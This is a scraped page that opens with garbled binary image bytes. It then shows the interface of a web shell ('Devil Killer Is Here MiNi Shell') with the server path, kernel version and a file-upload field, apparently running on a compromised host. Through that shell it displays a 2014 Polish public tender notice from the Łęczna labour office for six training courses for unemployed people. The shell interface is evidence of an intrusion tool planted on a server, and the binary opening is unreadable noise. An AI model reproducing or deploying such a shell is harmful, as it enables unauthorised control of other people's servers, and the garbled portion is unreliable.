JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140403/112544-N-2014.html

<p class="kh_header"><b>Łęczna: Przetarg nieograniczony na realizacje usług szkoleniowych dla osób bezrobotnych w ramach projektu Nowe perspektywy</b><br>
<b>Numer ogłoszenia: 112544 - 2014; data zamieszczenia: 03.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , AL. Jana Pawła II 95, 21-010 Łęczna, woj. lubelskie, tel. 81 7521158, faks 81 7521031.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na realizacje usług szkoleniowych dla osób bezrobotnych w ramach projektu Nowe perspektywy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń zawodowych dla osób bezrobotnych zarejestrowanych w PUP w Łęcznej w ramach projektu Nowe perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Przedmiot zamówienia podzielony na VI części: Część I - Magazynier z obsługa wózka jezdniowego z napędem silnikowym Część II Gastronomia z elementami cateringu Część III Opiekun osób starszych, chorych i niepełnosprawnych Część IV Sprzedawca z obsługą kasy fiskalnej i komputera Część V Pracownik produkcji - sortowacz Część VI Pracownik biurowy z obsługą komputera. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do siwz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli będzie posiadać wpis do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę Wykonawcy Wojewódzki Urząd Pracy zgodnie z art. 20 ust. 1 ustawy z dnia 20.04.2004r. o promocji zatrudnienia i instytucjach rynku pracy - dotyczy wszystkich części.
Ocena spełniania warunków zostanie dokonana na podstawie złożonych oświadczeń i dokumentów według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia przez niego działalności jest krótszy - w tym okresie wykonał, co najmniej 3 usługi szkoleniowe o wartości co najmniej  6 000,00 zł. każda oraz potwierdzi, że zostały one wykonane należycie - dotyczy części I i II.

Wykonawca spełni ten warunek, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia przez niego działalności jest krótszy - w tym okresie wykonał, co najmniej 3 usługi szkoleniowe o wartości co najmniej  25 000,00 zł. każda oraz potwierdzi, że zostały one wykonane należycie - dotyczy części III i IV.
 Wykonawca spełni ten warunek, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia przez niego działalności jest krótszy - w tym okresie wykonał, co najmniej 3 usługi szkoleniowe o wartości co najmniej  12 000,00 zł. każda oraz potwierdzi, że zostały one wykonane należycie - dotyczy części V i VI.

Ocena spełniania warunków zostanie dokonana na podstawie złożonych oświadczeń i dokumentów według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże, że:
dysponuje salą dydaktyczną adekwatną do ilości uczestników szkolenia z osobnymi stanowiskami dla każdego uczestnika, z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki - dotyczy wszystkich części.
 dysponuje 1 wózkiem jezdniowym - dotyczy części I.
 wykaże, że zajęcia praktyczne zostaną zrealizowane w lokalu gastronomicznym umożliwiającym prawidłową realizację programu szkolenia - dotyczy części II.
 wykaże, że zajęcia praktyczne zostaną zrealizowane w miejscu związanym z opieką nad osobami starszymi, chorymi i niepełnosprawnymi umożliwiającym prawidłową realizację programu szkolenia - dotyczy części III.
 wykaże, że zajęcia praktyczne zostaną zrealizowane w placówkach handlowych umożliwiającym prawidłową realizację programu szkolenia - dotyczy części IV.

Ocena spełniania warunków zostanie dokonana na podstawie złożonych oświadczeń i dokumentów według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:
dysponuje lub będzie dysponować kadrą posiadającą kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia:
 dysponuje wykładowcami posiadającymi doświadczenie w dziedzinie zgodnej z tematyką prowadzonego szkolenia tj. co najmniej 200 godzin szkoleniowych przepracowanych lub co najmniej 2 letnie doświadczenie w tej dziedzinie - dotyczy wszystkich części.
 dysponuje lub będzie dysponować osobami w charakterze zastępstwa za wykładowcę, który nie będzie mógł przeprowadzić zajęć. Osoby muszą mieć kwalifikacje przynajmniej równe określonym w niniejszym ppk. 5.3.1.1. - dotyczy wszystkich części
Ocena spełniania warunków zostanie dokonana na podstawie złożonych oświadczeń i dokumentów według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa sposobu oceny spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz wykonanych usług szkoleniowych w zakresie niezbędnym do wykazania spełniania warunków wiedzy i doświadczenia, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane - załącznik nr 5 do siwz. 
Dokumenty potwierdzające, że wszystkie usługi wskazane w w/w wykazie zostały wykonane należycie: poświadczenie podmiotów na rzecz których usługi zostały wykonane lub dokumenty potwierdzające należyte wykonanie usług np. listy referencyjne, protokoły odbioru itp.
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia -  kadra podstawowa i rezerwowa załącznik nr 6 do siwz. 
Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - załącznik nr 7 do siwz. 
Oświadczenie z art. 24 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 8 do siwz.
Wykonawca jest zobowiązany złożyć kwestionariusz szkolenia - załącznik nr 2 do siwz dla każdej części oddzielnie.
Wykonawca jest zobowiązany złożyć formularz cenowy - załącznik nr 3 do siwz dla każdej części oddzielnie.
 Wykonawca jest zobowiązany złożyć zaakceptowany wzór umowy wraz z ankietami- załącznik nr 10 do siwz.
Wykonawca jest zobowiązany przedłożyć opracowany wzór ankiety służący ocenie szkolenia. 
Wykonawca jest zobowiązany przedłożyć opracowany i wykorzystywany przez Wykonawcę dokument potwierdzający zapewnienie nadzoru  wewnętrznego służącego podnoszeniu jakości prowadzonego szkolenia.
Wykonawca jest zobowiązany przedłożyć wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji.
Wykonawca (w przypadku jego posiadania) zobowiązany jest przedłożyć certyfikat jakości usług.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Ilość wykonanych usług mających za przedmiot usługi szkolenia zgodne z opisem przedmiotu zamówienia - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może ulec zmianie w wyniku wystąpienia następujących okoliczności ze strony wykonawcy:
- zmiany miejsca wykonywania zamówienia pod warunkiem, że nowe miejsce szkolenia zlokalizowane będzie zgodnie z warunkami wskazanymi w siwz,
- zmiany terminu szkolenia pod warunkiem zmieszczenia się w przedziale czasowym określonym w opisie przedmiotu zamówienia,
-  zmniejszenia się liczby uczestników szkolenia z przyczyn niezależnych od Zamawiającego i będących wynikiem: 
a)	niestawienia się kandydata na szkolenie pomimo wydania skierowania na szkolenie,
b)	przerwania uczestnictwa w szkoleniu (np. podjęcie zatrudnienia lub innej pracy zarobkowej, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy,
c)	nie podjęcia szkolenia po wydaniu skierowania,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.leczna.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
Al. Jana Pawła II 95
21-010 Łęczna
/pok. 110/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2014 godzina 07:30, miejsce: Powiatowy Urząd Pracy
Al. Jana Pawła II 95
21-010 Łęczna /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa w ramach projektu Nowe perspektywy 
Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Magazynier z obsługą wózka jezdniowego z napędem silnikowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin: 120 godzin zegarowych (łącznie z przerwami). Zajęć praktycznych powinno być nie mniej niż 40 godzin zegarowych.
Liczba osób: 5
Liczba grup kursowych: 1 
Zakres szkolenia powinien obejmować w szczególności następujące zagadnienia:
- podstawy obsługi komputera
- wybrane zagadnienia prawa pracy
- wybrane zagadnienia prawne działalności gospodarczej
- wybrane zagadnienia prawa cywilnego w zakresie umów
- wybrane zagadnienia prawa podatkowego i ZUS
- gospodarka magazynowa
- obsługa programu komputerowego do prowadzenia magazynu
- kierowca wózków jezdniowych z napędem silnikowym
- zajęcia praktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość wykonanych usług mających za przedmiot usługi szkolenia zgodne z opisem przedmiotu zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Gastronomia z elementami cateringu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin: 120 godzin zegarowych (łącznie z przerwami). Zajęć praktycznych powinno być nie mniej niż 72 godziny zegarowe.
Liczba osób: 5
Liczba grup kursowych: 1 
Zakres szkolenia powinien obejmować w szczególności następujące zagadnienia:
- podstawy żywienia, jakość zdrowotna żywności, 
- proces technologiczny w produkcji gastronomicznej, 
- wymogi systemu HACCP w gastronomii, 
- charakterystyka i obsługa urządzeń gastronomicznych,
- receptury i techniki sporządzania dań głównych i przekąsek, planowanie posiłków i układanie menu, 
- formy obsługi konsumenta,
 - serwowanie potraw,  
-organizacja pracy w małej gastronomii, 
- organizowanie imprez okolicznościowych (catering) oraz ekspedycji wyrobów kulinarnych,
dekorację stołów, 
- przedsiębiorczość w zakresie samozatrudnienia;
- zajęcia praktyczne (zajęcia praktyczne powinny odbywać się w lokalu gastronomicznym)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość wykonanych usług mających za przedmiot usługi szkolenia zgodne z opisem przedmiotu zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opiekun osób starszych, chorych i niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin: 150 godzin zegarowych (łącznie z przerwami). Zajęć praktycznych powinno być nie mniej niż 70 godzin zegarowych.
Liczba osób: 20 (z podziałem na dwie grupy szkoleniowe po 10 osób każda). Zajęcia muszą się odbywać się równolegle.
Liczba grup kursowych: 2
Zakres szkolenia powinien obejmować w szczególności następujące zagadnienia:
- podstawowe zagadnienia 
- etyka zawodowa opiekuna
- podstawowa opieka zdrowotna
- zagadnienia z geriatrii
- profilaktyka osób starszych
- zasady udzielania pierwszej pomocy przedlekarskiej
- żywienie osób starszych
- podstawowe zabiegi pielęgnacyjne i higieniczne
- rehabilitacja lecznicza
- organizacja czasu wolnego osób starszych
- wykonywanie codziennych czynności z zakresu gospodarstwa domowego
- pomoc społeczna i współpraca ze środowiskiem podopiecznego
- zajęcia praktyczne (realizowane w miejscach związanych z opieką nad osobami starszymi, chorymi i niepełnosprawnymi).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość wykonanych usług mających za przedmiot usługi szkolenia zgodne z opisem przedmiotu zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sprzedawca z obsługa kasy fiskalnej i komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin: 120 godzin zegarowych (łącznie z przerwami). Zajęć praktycznych powinno być nie mniej niż 80 godzin zegarowych.
Liczba osób: 20 (z podziałem na dwie grupy szkoleniowe po 10 osób każda). Zajęcia muszą się odbywać równolegle.
Liczba grup kursowych: 2 
Zakres szkolenia powinien obejmować w szczególności następujące zagadnienia:
- przepisy prawne obowiązujące w sprzedaży;
- dokumentacja handlowa;
- organizacja pracy w jednostkach handlowych;
- techniki sprzedaży;
- profesjonalna obsługa klienta;
- obsługa kas fiskalnych różnych typów i urządzeń peryferyjnych (czytników kodów kreskowych, czytników kart płatniczych, metkownicy)
-obsługa drukarki fiskalnej, wagi elektronicznej;
-podstawy obsługi komputera (Word. Excel);
- obsługa komputerowych programów użytkowych w handlu, BHP w handlu, minimum sanitarne
- zajęcia praktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość wykonanych usług mających za przedmiot usługi szkolenia zgodne z opisem przedmiotu zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pracownik produkcji - sortowacz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin: 120 godzin zegarowych (łącznie z przerwami). Zajęć praktycznych powinno być nie mniej niż 90 godzin zegarowych.
Liczba osób: 10
Liczba grup kursowych: 1 
Zakres szkolenia powinien obejmować w szczególności następujące zagadnienia:
- BHP na stanowisku pracy;
- minimum sanitarne ;
- struktura organizacyjna i proces produkcji mrożonych owoców i warzyw;
- utrzymanie porządku na stanowisku pracy; 
- system BRC - standard bezpieczeństwa żywności;
- mycie i sortowanie opakowań ;
- sortowanie warzyw i owoców świeżych; 
- zapoznanie z obowiązującymi instrukcjami technologicznymi przy produkcji mrożonek; 
- samodzielne prace przy wysortowywaniu mrożonek, pakowanie w opakowania zbiorowe ;
- przygotowywanie opakowań na wyroby (składanie kartonów);
- obsługa linii do sortownia warzyw świeżych i mrożonek;
- obsługa maszyn i urządzeń wykorzystywanych w zakładzie;
- zajęcia praktyczne (realizowane w miejscach związanych z sortowaniem i pakowaniem produktów).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość wykonanych usług mających za przedmiot usługi szkolenia zgodne z opisem przedmiotu zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pracownik biurowy z obsługą komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin: 150 godzin zegarowych (łącznie z przerwami). Zajęć praktycznych powinno być nie mniej niż 70 godzin zegarowych.
Liczba osób: 10
Liczba grup kursowych: 1 
Zakres szkolenia powinien obejmować w szczególności następujące zagadnienia:
1.	Organizacja pracy biurowej:
- organizacja pracy pracownika biurowego,
- obsługa urządzeń biurowych
2.	Informacja i dokumentacja w biurze:
- dokumentacja biurowa w firmie,
- postępowanie z dokumentacją biurową
3.	Komunikacja oraz etykieta biurowa:
- efektywna komunikacja,
- etykieta pracy biurowej
4.	Obsługa komputera oraz specjalistycznych programów biurowych:
- obsługa edytora tekstu,
- tworzenie prezentacji multimedialnych,
- obsługa arkusz kalkulacyjny (Excel),
- obsługa Internetu,.</p></li>
